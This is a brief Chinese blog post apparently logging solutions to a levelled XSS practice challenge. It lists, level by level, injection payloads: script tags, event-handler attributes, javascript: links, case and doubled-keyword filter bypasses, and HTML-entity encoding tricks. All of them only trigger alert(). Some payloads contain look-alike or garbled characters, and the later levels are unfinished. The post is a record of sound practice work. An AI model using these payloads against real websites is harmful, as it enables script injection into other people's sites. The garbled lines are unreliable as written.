admin 管理员组

文章数量: 1184232

XSS

Level 1

Palyload:name=<script>alert(/test/)</script>

Level 2

Playload:keyword="><script>alert(/xss/)</script><"

 

Level 3

Palyload:keyword=' οnmοuseοver=’alert(/xss/)’

 

Level 4

Palyload:keyword=" οnmοuseοver='alert(/xss/)'

 Level 5

Playload:“><a href=”javascript:alert:alert(/xss/)”>click</a>

Level 6

Playload:keyword=" ONmouseover='alert(/xss/)'

 Level 7

Playload:keyword=" oonnmouseover='alert(/xss/)'

Playlaod:keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>

 

Level 8

Playload:keyword=java&#x73;cript:alert(/xss/)

Playload:keyword=java&#115;cript:alert(/xss/)      html实体编码绕过

 

Level 9

Playload:keyword=java&#115;cript:alert('')

 

Level 10

Playload:t_sort="  type="botton" οnmοuseοver='alert(/xss/)'

               t_sort=click" type="button" οnclick="alert(/xss/)"

查看源码:

 

测试发现:

  

结果:

 

Level 11

Playload:

稍等,测试中。。。

本文标签: XSS

版权声明:本文标题:XSS 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1687826313a146138.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。